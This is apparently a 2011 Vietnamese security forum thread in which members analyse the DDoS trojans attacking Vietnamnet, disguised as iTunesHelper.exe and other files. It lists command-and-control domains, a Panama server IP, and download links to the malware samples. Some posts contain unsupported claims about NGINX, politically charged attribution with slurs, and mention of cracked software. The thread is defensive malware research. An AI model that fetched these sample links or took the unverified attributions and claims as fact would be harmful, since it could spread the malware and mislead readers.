Còn các bác ở vietnamnet có vẻ đang lúng túng. Chuyển từ báo in sang báo mạng, họ găp nhiều khó khăn và có thể vẫn làm việc theo cơ chế cũ kỹ. Ban Tổng biên tập của họ dường như không co các chuyên gia tầm cỡ về IT để có thể chỉ đạo và đưa ra các chính sách kỹ thuật, bảo mật hơp lý. Vietnamnet tăng trưởng quá nhanh, nhưng lại không cân đối với trình độ và năng lưc quản lý mạng, IT, vốn còn lạc hậu, không theo kip.
Họ quản lý rất nhiều IP tĩnh nhưng việc bố trí các website và sử dụng khối IP đó một cách hợp lý thì lại đang có vấn đề. Khi bị tấn công DDoS, thay vì họ phải bố trí lại kết cấu hạ tầng mạng một cách hợp lý hơn, thì họ lai đưa các web server NGINX vào để thay thế Apache, hay làm một chốt chặn đầu vào, trong khi NGINX có một lỗi chết người là lỗi buffer overflow liên quan đến khả năng lọc input data của nó khá kém và hay có lỗi. Một số chuyên gia quốc tế nói là NGINX thường chỉ được các tổ chức tội phạm ưa dùng vì có thể "đánh nhanh rút nhanh".
Với khả năng tài chính dồi dào, vietnamnet hoàn toàn có thể nhờ AkamaiTechnologies hỗ trợ và quản lý hệ thống để loại trừ tác hai của DDoS, như nhiều công ty lớn hay rất lớn của Mỹ đã nhờ, nhưng họ lại chưa làm. Không rõ tai sao... vân vân.
Cũng có một điều là các công ty, xí nghiệp, tổ chức của VN thường có bệnh thành tích. Và vì vậy họ thường giấu kín các khuyết điểm, không muốn nói ra các khó khăn. Sơ bị trên đánh giá là thiếu năng lưc hoan thành nhiệm vụ....
Mà có nhờ ai, thì họ phải tìm những cơ quan lớn, cơ quan cấp trên (như Bộ Khoa học công nghệ chẳng hạn). Ai lai nhờ HVA, sợ mang tiếng. Thế đấy. Hi hì.
Tôi cũng nghĩ là các thành viên STL là người VN 100%, như chính chúng ta. Chỉ có tổ chức lãnh đạo, trả lương và điều khiển, hướng dẫn KT cho họ là các bác TQ thôi.
|
|
|
|
mv1098 wrote:
PXMMRF wrote:
Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network.
Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD.
IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có.
Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra.
Anh có thể dùng ip2location.com để xác định địa chỉ vật lý của ip. Trang web này cung cấp thông tin về ip khá uy tín, 1 database full info của nó cũng tầm 1599/server
Mình cũng thường tham khảo website này, nhưng chỉ để so sánh. Nhưng đó là một website khá tốt.
Nói chung về các phương diện kiểm tra trên mang mình cố tìm và dùng những phần mêm Pro, chuyên nghiệp, hạng nhất (có soft giá chính thức đến vài trăm ngàn USD. Mình tìm phiên bản cũ rồi tìm cách update nó lên để tạm dùng). Tất nhiên là không thể mua chúng một cách chính thức.
Trường hợp khác, có khi phải mua hàng trăm đĩa CD loại 6K, nay có chỗ tăng lên 8K (vì inflation) mới tìm ra cái soft. mình cần. Hoặc tìm trên mạng và rồi phải sống chung với virus. Trang crack nào cũng có cài mã độc cả
|
|
|
|
Mr Ghost wrote:
@PXMMRF: Về việc các server đặt tại Panama hay UA hay ở RUS đều do các nhà cung cấp có các tuỳ chọn thanh toán thông qua Webmoney hay LR. Những cổng thanh toán này không cần xác thực danh tính người mua và nơi bán cũng chằng quan tâm đến người mua dùng server này để làm gì... Có tiền thanh toán thì bất kể người nào mua cũng được. 
Không phải thế đâu!
Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network.
Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD.
IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có.
Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra.
|
|
|
|
texudo wrote:
PXMMRF wrote:
Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?
Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích.
Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác.
Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang.
|
|
|
|
VỀ VIỆC XÁC ĐỊNH KỸ LAI MASTER WEBSERVER CỦA STL ĐIỀU KHIỂN CUỘC TẤN CÔNG DDoS VÀO HỆ THỐNG MẠNG CỦA VIETNAMNET
1- Về master webserver này ngoài ý kiến của tôi, đã có một số ý kiến khác, như sau:
PXMMRF 25/08/2011 23:00:12 wrote:
Master webserver có thể là một trong 2 webserver này:
www.rackspace.com IP 207.97.209.147, đặt tai Mesa, AZ, United States
host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?)
Hiện nay chưa có thời gian check để xác định cụ thể là webserver nào? Vừa qua cũng chưa thấy có kết nôi download file từ webserver đến máy nạn nhân (client).
Riêng việc các bác "16 chữ vàng" đặt và vận hành được webserver ở tận Panama thì quả thật em phải ngả mũ cúi chào. Chỉ có nước các bác lắm tiền, nhiều quân thì mới đủ sức đầu tư đến tận châu Phi, châu Mỹ Latinh. Chắc nước VN chúng em thì chịu.
mv1098 26/08/2011 00:27:22 wrote:
@anh PXMMRF
host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?)
Nó nằm ở Panama City luôn anh à, thủ đô của nó là Panama luôn
theo suy luận của em chắc là 200.74.244.198 vì có cái nginx quen thuộc
TQN 26/08/2011 01:51:49 wrote:
Kết quả rce sơ bộ file k113.css chứng tỏ nhận định của tui, còn một thằng nằm vùng trên máy của 1visao đã download file k113.css này về.
Dùng Plugin PE Extract của PEiD, ta extract ra được hai file .exe giống y chang ituneshelper.exe và iTunesHelper-tray.exe. Các bạn xem kỹ hình minh hoạ.
RCE vào thẳng k113.css, ta thấy lần này, coder không dùng overlay hay zip data để nhúng PE file, thay vào đó cậu ta nhúng trực tiếp 2 file exe trên vào vùng .data section luôn, cho nên plugin PE Extract dể dàng extract ra được.
……………………………………………………………….
PS: Chà, bà con thức khuya theo dõi dữ ha. Thôi đi ngủ đi bà con, gần hạ màn rồi, giờ chỉ là up các file .exe và thằng exe mạo danh k113.css (Giống cảnh sát 113 quá ha) này lên cho các AVs nhai xương, và report bad links, bad site các cái website sau cho nó đi die luôn cho rồi:
Code:
http://wide.ircop.cn
http://pref.firebay.cn
http://daily.leteaks.com
http://link.susaks.com
http://option.drfound.net
Chúc bà con ngủ ngon, cuối cùng anh em HVA ta đã đi gần tới đích sau mấy tháng trời căng thẳng, mệt mỏi với tụi "sống chết theo lệnh", "sờ ti lợn", "ét ti eo" này 
2- Ở đây chúng ta cần phân biệt hai nhóm website-webserver
- Nhóm thứ nhất gồm 4 website:
http://wide.ircop.cn
http://pref.firebay.cn
http://daily.leteaks.com
http://link.susaks.com
- Nhóm thứ hai chỉ có một website -webserver là:
http://option.drfound.net
Website của nhóm website-webserver thứ hai chứa một file (tại webroot) có tên là k113.css (dung lương 1.030KB). File này, như anh TQN đã RCE (với PEid 0.95- dùng một plugin phù hợp), chứa 2 file là iTunesHelper.exe và iTunesHelper-tray.exe. iTunesHelper.exe này chính là 1 DDoS tool của STL (đã qua thử nghiệm thưc tế trên server thử nghiệm của tôi)
Websites của nhóm website-webserver thứ nhất mới là các master website-webserver điều khiển các cuộc tấn công DDoS vào mục tiêu. Trên các website này chứa các file .txt được mã hoá, hướng dẫn DDoS tool thay đổi mục tiêu tấn công (tên miền, đia chỉ IP, đia chỉ URL...).... Cần lưu ý là trong quá trình iTunesHelper.exe tấn công DDoS vao VIETNAMNET nó thường xuyên kết nôi với master website-webserver này.
3- Có gì khác nhau giữa hai đia chỉ:
host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (do tôi xác định) và:
Code:
http://wide.ircop.cn
http://pref.firebay.cn
http://daily.leteaks.com
http://link.susaks.com
http://option.drfound.net
do anh TQN xác định?
Không có gì khác nhau cả.
host-200-74-244-198.ccipanama.com là hostname (computer name) của webserver. Webserver này có IP tĩnh là 200.74.244.198. Tất cả 4 website http://wide.ircop.cn, http://pref.firebay.cn, http://daily.leteaks.com, http://link.susaks.com đều đang hosting (đặt) trên webserver này.
Khi khởi phát trong hệ thống thì iTunesHelper.exe luôn kết nối đầu tiên với webserver nói trên.
4- Như đã phân tích webserver này đặt tại PANAMA (Trung Mỹ)
Webserver chỉ cài một trình quản lý WEB là NGINX và bình thường các website trên nó chỉ có một file duy nhất là index.html với dòng chữ "ls-lia!" (không hiểu cấp trên của STL viết gì). Khi cần thiết các website trên webserver cùng upload các file .txt (đươc mã hoá) có nội dung giống nhau để update thông tin cho các DDoS tool, nằm trong các zombies trên mạng.
Chắc chắn là webserver này đươc thiết lập chỉ nhằm mục đích điều khiển các cuộc tấn công DDoS, có thể trên phạm vi toàn cầu, không hẳn chỉ nhằm vào VIETNAMNET. Nhưng trong thời gian này nó "ưu tiên" cho mục tiêu VIETNAMNET.
Mục tiêu tấn công là phải phục vụ cho "đường lối, mục tiêu chính trị' mà cấp trên chỉ đạo. Hì hì.
Có người thắc mắc là sao một website với domain có hậu tố là .cn (China) lai được phép đặt ở nước ngoài. Câu trả lời là: Không rõ TQ có luật không cho phép các website của các cơ quan nhà nước đặt trên các webserver đặt tai nước ngoài, như ở VN, hay không?. Giả dụ nếu có, thì các lãnh đạo của STL sẽ tuyên bố:
wide.ircop.cn, pref.firebay.cnchỉ là của tư nhân. Vả lai đã là việc của nhà nước, thì làm gì chả được, kể cả việc đó có vi phạm luật lệ hiện hành.
5- Như ta đã biết, các cấp trên của STL đang cho mang bot tấn công vào VIETNAMNET theo 2 hướng:
- Tấn công vào mọi website (với các domain khác nhau) của VIETNAMNET
- Tấn công vào kết cấu hạ tầng mạng của VIETNAMNET
Thí dụ:
- iTunesHelper.exe tấn công vào cả vietnamweek.net (Tuần Việt nam) . Đây là một webserver của vietnamnet đặt tai Mỹ có IP là 209.160.52.52.
Action:Monitored
Application:iTunesHelper.exe
Access:Outbound TCP access
Object:1580 -> 209.160.52.52:80 (http)----> vietnamweek.net
Interface:[1] Compaq NC3131 Fast Ethernet NIC
Time:8/30/2011 7:12:31 AM
- iTunesHelper.exe cũng tấn công vào địa chỉ: 15.14.91.183-ftth.cmcti.vn (IP là 183.91.14.15, trong IP network 183.91.14.0/23) là route thuộc kết cấu hạ tầng cung cấp kết nối Internet cho tuanvietnam.net.
6- Những sự việc liên quan đến việc tấn công DDoS vao VIETNAMNET vừa qua, mà HVA đã phân tích, chứng tỏ đã có sự tham gia (can dự) của nhóm thành viên lãnh đạo của STL và họ là người TQ. Những công việc phức tạp đòi hỏi một nền tảng kỹ thuật mạng khá cao, như việc điều khiển, thiết lập, định kỳ ngừng hay đưa vào sử dụng các dedicated master-webserver đặt ở nhiều nơi trên TG (có cả PANAMA)... thì phải do các cấp lãnh đạo STL mới có khả năng và quyền hạn làm được. Mấy cậu STL tai VN chắc không thể có khả năng và/hoặc quyền hạn để làm.
Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?
Ngay sau khi kích hoạt, iTunesHelper.exe kết nối đầu tiên với master-webserver
Vị trí địa lý, IP và hostname của master webserver
Vị trí địa lý, IP và hostname của option.drfound.net
Cuộc tấn công DDoS mới nhất (sáng nay) vào vietnamnet
|
|
|
|
phuongnvt wrote:
bác cứ làm tốt cái vụ này cho xong đi, xong rồi bà con tặng bác 1 con laptop mới
ah mà nếu ko có thì liên hệ tui, tui cho thuê laptop giá rẻ 1 ngày 1 chai ken và 1 ổ bánh mì là được rồi!!!!!!!!!!
Thế có bác nào ở vietnamnet.vn đang vào đây xem thì lên tiếng xem nào. Thanks. Nếu không là tôi kiểm tra đấy nhé. Hì hì. Giỡn chơi thôi!
|
|
|
|
TQN wrote:
Con đang DDOS Vietnamnet chính là iTunesHelper.exe đấy anh PXMMRF. Các tấm hình em vừa post chính là minh hoạ quá trình debug con này. Nó đang download index.txt từ http://wide.ircop.cn/index.txt?113, giãi mã ra bằng unzip trên memory và CAST256, sau đó nó dùng thư viện libcurl (thư viện core của chương trình curl) để parse và tấn công crawler theo dạng các tool download nguyên website về đấy anh !
2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi.
Cậu up giùm tui các file .dll sau:
1. IAStorCommon.dll
2. IAStorUIHelper.dll
3. IAStorDataMgr.dll
4. SmartPin.dll
5. SysInftLib.dll
Nếu quả là của stl thì em chỉ biết chửi nữa chứ làm gì, lan tràn quá rồi.
Ừ tôi đã xác định 100% chính iTunesHelper.exe là STL DDoS tool từ sớm hôm qua rồi mà, ngay khi mà 1visao upload file iTunes lên mang. Cả chiều và đêm hôm qua tôi thử nghiệm DDoS tool này trên thưc tế và có một đống dữ liệu, kể cả những master webserver nghi ngờ, như tôi đã viết (trang 23, topic này).
Ý tôi hỏi là sợ 1visao lại tìm ra một con Trojan khác DDoS vào vietnamnet.vn, thay vì con iTunesHelper.exe, vì con này ta đã biết rõ rồi.
Tôi cũng đã đoc kỹ các bài viết của TQN về khía canh liên quan, mà tôi cũng đang thắc mắc là con gì download iTunesHelper.exe về máy nạn nhân và download từ đâu (Các bài viết này ngay sau bài viết của tôi. Bài viết của tôi đã khẳng định 100% iTunesHelper.exe là DDoS tool, tấn công vào toàn bộ kết cấu hạ tầng mạng của vietnamnet.net)
|
|
|
|
1visao wrote:
conmale wrote:
Hello 1visao,
Nhờ 1visao tìm trên máy xem có cái "WS2_32.dll" không? Nếu có vui lòng upload lên giúp luôn nha? Cám ơn.
Đây là file anh conmale cần.
http://www.mediafire.com/?qiki732uson224n
2 bolzano_1989, TQN , đây là kết quả log Autoruns, Autorunsc , scan lúc 7:30AM sáng nay.
http://www.mediafire.com/?uk4q4g8e50ms208
Con malware này không chỉ DDos vào trang index của vietnamnet , mà còn DDos sâu vào thư mục chứa các bài viết, đúng với phân tích của anh conmale về con malware Ddos vào hva.
Trước hết cám ơn 1visao vì đã tìm ra và cung cấp cho HVA file nghi vấn iTunes.rar. Tuy nhiên trong file này khi extract ra thì có 4 file và (lúc đó) chỉ có 1 file bị Avira và KIS phat hiện là vírus, là file data.mdf, còn file iTunesHelper.exe thì KIS và Avira đều không detect được nó là một Trojan, nhưng tôi nghi nó chính là DDoS tool của STL tấn công vào vietnamnet.vn (như tôi đã viết ở bài viết trên)
Hôm nay 26-8-2011 thì Avira đã detect được file iTunesHelper.exe là virus, tên là "TR/Diple.acxu"
(hôm trước thì Avira gọi Trojan nhúng trong data.mdf là TR/Diple.acju- tên hơi khác phần đuôi). Đây là phản hồi rất tích cưc của Avira, sau khi anh TQN submit mẫu file iTunesHelper.exe đến Avira (vào chiều hôm qua)
Trong bài viết của em trên đây, nhóm từ Con malware này, thì ý em ám chỉ con trojan nào? Có phải là chính iTunesHelper.exe không?
|
|
|
|
vnchampion wrote:
Chào các bác !
Trời ạ, Hôm nay em mới seach từ Khoá Unikey nethoabinh
Hiện tại trang web nethoabinh.com là trang web của em 
Thực sự em đọc topic này mà rùng rợn người.
Từ trước tới nay em cài bao nhiêu phần mêm viruts quét rùi
mà file unikey em tải lên là File sạch
Giờ lại thấy các bác báo cáo thế, Em lại update và quét thì quả thật có báo
http://www.virustotal.com/file-scan/report.html?id=298452c3c9f0c638bea809bb8d4d890c6802272a5cc0aac7064531bbae98627e-1314287130
Em không biết một tí gì vì em load trực tiếp trên trang chủ của Unikey.org ????
Rùi update lại cho anh em dùng thôi - Giờ lại ra thế này thì em cũng chả biết phải tin vào ai bây giờ .
Nếu đợt tấn công vừa rồi là nguyên nhân do file unikey của bên em phát tán thì em thật sự xin lỗi và Em thề là không biết một tí gì vì tin tưởng load trên trang chủ và
quét các phần mềm diệt viruts rùi
Em xin cảm ơn.
Không! File Unikey của em upload lên website của em (nethoabinh.com) là file Unikey sạch mà. Anh đã kiểm tra kỹ và đã có báo cáo chi tiết trong topic này (ở các trang đầu topic). Unikey này bạn lequi download về, nghi là có virus, nhưng thưc tế là file sạch, chạy tốt.
|
|
|
|
TQN wrote:
Thằng coder của con fake ITunes này là coder C++, chỉ quen dùng C++ ATL/MFC string, trong khi toàn bộ source của libcurl là pure C.
Avira đã có trả lời, mới up hồi chiều, nhanh thật: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=809945
Bạn 1visao vui lòng up giùm file Autoruns của bạn, vì chắc chắn trên máy bạn còn 1 thằng nằm vùng khác download ituneshelper.exe về. File data.mdf cũng chính là ituneshelper.exe nhưng có version cũ hơn.
Tức là lúc đầu con nằm vùng đó download ituneshelper.exe ver cũ về, sau đó một thời gian, nó kết nối tới đâu đó, thấy có lệnh cập nhật, nó down ituneshelper.exe mới về, kill process ituneshelper.exe cũ, rename, copy ituneshelper.exe mới vào thư mục ban đầu rồi run, đăng ký autorun. Và sẽ có một website nào đó nữa ta chưa biết chứa con trojan và file ra lệnh cập nhật này.
PS: Em nói đúng không mấy anh stl. RCE code mấy anh riết ngán quá rồi 
Master webserver có thể là một trong 2 webserver này:
www.rackspace.com IP 207.97.209.147, đặt tai Mesa, AZ, United States
host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?)
Hiện nay chưa có thời gian check để xác định cụ thể là webserver nào? Vừa qua cũng chưa thấy có kết nôi download file từ webserver đến máy nạn nhân (client).
Riêng việc các bác "16 chữ vàng" đặt và vận hành được webserver ở tận Panama thì quả thật em phải ngả mũ cúi chào. Chỉ có nước các bác lắm tiền, nhiều quân thì mới đủ sức đầu tư đến tận châu Phi, châu Mỹ Latinh. Chắc nước VN chúng em thì chịu.
|
|
|
|
Đúng 100% iTunesHelper.exe là DDoS tool của STL. Nó tấn công khá nhanh và khá manh, liên tục vào 7 IP, đều là của vietnamnet.vn. Nghĩa là nó tấn công toàn bộ kết cấu hạ tầng của vietnamnet.vn, từ các webserver đến các Route. Kinh khủng và liều mạng.
Mấy cậu nhóc VN thì đâu có kiến thức về kết cấu hạ tầng mạng để có thể tấn công như vậy. Các bác VN nhiều tuổi, giỏi và có kinh nghiệm về IT Network thì có cho kẹo cũng không dám làm, vì vietnamnet.vn là tờ báo mạng lớn và quan trọng của nhà nước, động vào là rất phiền.
Chỉ có các bác Khựa ngang ngược, ỷ thế nước lớn, coi VN không ra gì, mới làm như vậy.
Báo cao khảo sát thưc tế đã xong, đang hoàn tất thêm chút ít (chủ yếu là xem lai kết cấu hạ tầng mạng của vietnamnet.vn) và sẽ post lên.
|
|
|
|
weasel1026789 wrote:
Em vừa submit file ituneshelper.exe lên web của: Symantec, McAfee, Nod32, Microsoft, Avast, AVG, Bitdefender.
Em tự hỏi chúng ta có nên liên lạc với danlambaovn nhờ họ thông báo rộng rãi cho đọc giả giúp submit các file nhiễm trojan STL lên các website của các chương trình antivirus không?
Ta nên kiểm tra kỹ hơn và cũng nên kiểm tra trong thưc tế, khi có kết quả chính xác thì thông báo cũng kịp
|
|
|
|
conmale wrote:
1visao wrote:
chắc đây là mẫu mới của đám Malware Sinh tử lệnh, TQN cần file gì để mình gửi
dùng tcpview bắt được .
chuyển qua proxy thì thấy liên tục gửi request đến địa chỉ vietnamnet
Địa chỉ download file ituneshelp
http://www.mediafire.com/?my3ge2sqvnlno76
13:20 pm , sau khi post bài này đã ngưng gửi request tới Vietnamnet , thêm vào đó thấy được mấy địa chỉ lạ
http://daily.leteaks.com/index.txt?
http://wide.ircop.cn/index.txt?
http://pref.firebay.cn/index.txt?
http://link.susaks.com/index.txt?
Ha ha, hoan hô 1visao 
Cái này là đích thị con nai vàng tấn công vietnamnet rồi. Sẽ cập nhật thêm thông tin.
Các bạn CMC có bị đám bot tấn công không? Có IP (cho leased line) nào là 183.91.14.15 và 183.91.14.15 của CMCTI.vn đang sử dụng mà bị đập không?
Thêm:
Hoá ra 183.91.14.15 thuộc infrastructure của CMCTI.vn và IP này dùng để host tuanvietnam.vietnamnet.vn. Còn 183.91.14.11 thì host vef.vn.
Ngoài ra, vietnamnet.vn bị đánh vào 2 IP khác nhau (2 A records: 123.30.133.166 và 117.103.197.249). Còn vietnamweek.net host ở bên Mỹ (209.160.52.52) cũng chịu chung số phận.
Botnet này đánh vô tất cả các sites quan trọng của vietnamnet.
Cập nhật:
Tất cả zombies của botnet này hiện trỏ về master ở 200.74.244.198. IP này thuộc Panama. Nếu cần chặn, vncert có thể phối hợp các ISP để chặn ngay trên ISP level.
Hiện giờ chỉ có mỗi Kaspersky nhận diện con trojan này là: Trojan.Win32.Diple.acxu.
PS: sẵn tiện thông báo luôn cho công luận biết là nhóm thành viên HVA lộ diện trong việc phân tích và truy tìm malware của stl thường xuyên bị đe doạ bằng nhiều cách khác nhau. Hành vi phạm pháp và vô đạo đức bằng kỹ thuật nay bắt đầu chuyển sang hướng đe doạ. Xin thông báo để bà con rõ mức độ tồi tệ của sự việc.
Khi unrar con iTunes.rar ta có 4 files:
data.mdf
iTunesHelper-tray.exe
iTunesHelper.exe
ITUNESHELPER.EXE-2BE8106E.pf
Thì thưc ra file data.mdf mới bị detect là 1 Trojan. Avira cũng đã detect nó là Trojan TR/Diple.acju
Nhưng tôi lại nghi thành phần chính của DDoS tool là file iTunesHelper.exe cơ!
Đang thử nghiệm thưc tế.
|
|
|
|
Như đã thấy, chúng ta đã thử nghiệm thưc tế, phân tích 2 DDoS tool của STL. Hôm nay tôi xin thông báo kết quả thử nghiệm thưc tế và phân tích DDoS tool thứ 3 của mạng STL bot. Có thể tạm goi đây là các DDoS tool điển hình (typical) của STL.
DDoS tool thứ nhất là MSHelpCenter.exe. File (process) này (cùng với một số file khác) đươc tạo lập từ một file Unikey (bị cài lén virus), khi người dùng cài nó vào máy. File Unikey có virus được download từ trên mạng. Tuy nhiên sau khi đươc tạo lập, file MSHelpCenter.exe này thưc tế không tạo ra được các kết nối- tấn công DDoS vào các máy mục tiêu. Hiện tượng này có lẽ xuất phát từ việc file có những lỗi (bug) sau khi được STL soạn thảo hay cải tiến từ một file khác.
DDoS tool thứ hai của STL là AcrobatUpdater.exe. File (process) này đươc giấu (embedded) trong một file ảnh, download về từ một webserver do STL quản lý. File nào của STL đã được cài sẵn trong máy, đóng vai trò một Trojan-downloader để download file ảnh nói trên về máy nạn nhân, thì còn cần được kiểm tra thêm. Khi được cài vào máy, file AcrobatUpdater.exe tạo lập một đường dẫn riêng trong thư mục C/WINDOWS/Program Files/ (trong Win XP và Win 2K3...), cũng như tự copy mình vào thư mục "Startup" để khởi động cùng với Windows khi nó start (boot) hay restart và tạo lập các (2) registry liên quan.
Ngay khi được cài vào máy hay ngay sau khi Windows restart, AcrobatUpdater.exe khởi phát ngay quá trình tấn công DDoS vào các webserver của HVA với nhịp độ tấn công khá nhanh và khá mạnh, khoảng từ 4-10 packets (SYN type-62Bytes)/giây. Trong quá trình DDoS thì STL bot cũng kết nối đến master webserver của STL, download về máy nạn nhân một file ảnh, để update DDoS tool. DDoS tool này được HVA đặt tên là TRJ/hvadetec-1.
DDoS tool AcrobatUpdater.exe này dường như STL soạn thảo để "ưu tiên" tấn công DDoS vào một mục tiêu duy nhất là HVA, chỉ riêng HVA mà thôi.
TRong khi thì DDoS tool thứ ba của STL là SbieSvc.exe thì lai được bố trí để DDoS vào nhiều mục tiêu trong cùng một lúc (thí dụ danlambao, viettan....). Chúng tôi DDoS tool này của STL là TRJ/hvadetec-2.
Như vậy ít nhất là còn một DDoS tool điển hình nữa của STL đã và đang tấn công vào trang mạng vietnamnet.vn. Như trường hợp HVA, có lẽ DDoS tool này cũng được bố trí để chỉ "ưu tiên" tấn công vào vietnamnet.vn, chỉ mình vietnamnet.vn mà thôi. Khi có kết quả thử nghiệm thưc tế DDoS tool này chúng tôi sẽ đặt tên cho nó là TRJ/hvadetec-3. Dĩ nhiên là STL có thể điều khiển các DDoS tool thay đổi muc tiêu. Nhưng tình hình những tháng vừa qua là được STL bố trí, dàn xếp như vậy
Mô tả quá trình gây nhiễm, kích hoạt của DDoS tool SbieSvc.exe (TRJ/hvadetec-3) và các đăc điểm của nó như sau:
1- (còn tiếp)
|
|
|
|
phanledaivuong wrote:
Hôm nay sáng dạy, phải vào đọc mấy trang tin tức 1 cái. Chả lẽ lại lên vnexpress.net đọc mấy cái truyện cười, hay lên 24h.com.vn đọc mấy cái truyện tình dục thế là thôi ta lớn rồi phải đọc thông tin tình hình đất nước 
vô ngay danlambaovn
Code:
Our systems have detected unusual traffic from your computer network. Please try your request again later. Why did this happen?
IP address: 1.55.112.150
Time: 2011-08-24T03:58:34Z
URL: http://danlambaovn.blogspot.com/2011/08/yeu-nuoc-chan-chinh-thanh-ra-phan-ong.html
giật mình không biết máy mình có bị virus STL không vậy, căn bản con lap em dùng thì thằng bạn suốt ngày vào mấy trang web linh tinh, mình thì cũng ít khi dùng toàn ra ngoài quán. bật wireshark lên thì thấy.
....................................................
Bật thử task manager lên thì thấy.
.......................................
em không có kinh nghiệm về kiểm tra virus lắm, không biết máy em có bị dính hàng của Sờ Ti Lợn không mấy anh nhỷ, nhưng tìm trong máy không thấy mấy cái Adobe Update với Google Chrome.
Máy em chắc chắn là nhiễm Virus-DDos tool của STL, loai TRJ/hvadetec-2, hay variant của nó.
Nhìn tên các máy mục tiêu (vietan.org) và những lỗi xảy ra trong quá trình kết nối-tấn công DDoS là thấy rõ vài vấn đề. Tôi sẽ phân tích kỹ trong bản báo cáo thử nghiệm sắp tới.
Các DDoS tool của STL thường là các Hiden process nên trên Task manager của Windows có thể không thấy. Ngoài ra việc tìm ra các folder-file lạ trong hệ thống cũng không dễ. Vì máy ta thường cài rất nhiều application và các DDoS tool-virus STL luôn mạo tên hoặc dùng tên file "thấy quen quen thế nào ấy". Hì hì
|
|
|
|
ivanst wrote:
......................................
- E vừa quét xong = BK pro + kis 2012 up date ngày hôm nay : 23/8/2011 luôn với 2 file anh TQN up lên MF là AcrobatUpdater_20_08_2011 và 15_8_2011 => Kis không ho he gì 2 file này cả , BK thì phang đc 1 em 15_8 còn 20_8 thì im re . Các file cũ của anh TQN up lên em chưa thử nên không biết như thế nào
- Em không quảng cáo hay làm gì đó BKis đâu nhé
Anh TQN mới đây đã RCE và uplpad lên mang 2 file virus của STL:
- AcrobatUpdater_15_08_2011
- AcrobatUpdater_20_08_2011
Tôi đã thử nghiệm trên thưc tế file (process) AcrobatUpdater.exe lấy từ AcrobatUpdater_20_08_2011 sau khi unzipped. Đây là một DDoS tool (virus) của STL đang tiến hành DDoS vào HVA. Tôi đã thông báo kết quả thử nghiệm chi tiết trong topic này. Khi tôi thử thì Avira không detect đươc AcrobatUpdater.exe này là virus-trojan.
Còn hôm nay thì Avira đã detect đươc, cụ thể như sau
Avira updated 24-8-2011 phát hiện
- AcrobatUpdater.exe (20-8) là Trojan TR/VB.AGS.3
- images01.gif (20-8- file đi kèm AcrobatUpdater.exe) cũng là TR/VB.AGS.3
- AcrobatUpdater.exe (15-8) là Trojan TR/VB.alf.2
- images01.gif (15-8- file đi kèm AcrobatUpdater.exe) cũng là TR/VB.alf.2
Kaspersky antivirus updated 23-8-2011 (hôm qua) thì không phát hiện ra virus trong tất cả 4 file nói trên. McAfee version 8.8 Enterprise cũng vậy, như KAS.
Tôi đã hoàn tất kết quả thử nghiệm một DDoS tool mới của STL là SbieSvc.exe (đi kèm với SbieMgm.dll) và dự kiến đặt tên nó là TRJ/hvadetec-2. Có những điểm thú vị, các bạn đón đọc
|
|
|
|
Tản mạn và tò mò với vietnamnet.net (just for fun)
Như các bạn đã biết, HVA đang cố gắng và quyết tâm tìm ra con STL bot và DDoS tool của nó đang tấn công DDoS vào trang mạng vietnamnet.
Có sự giúp sức nhiệt tình của các bạn như vừa qua, thì HVA (chủ công là TQN) sẽ tìm ra thôi
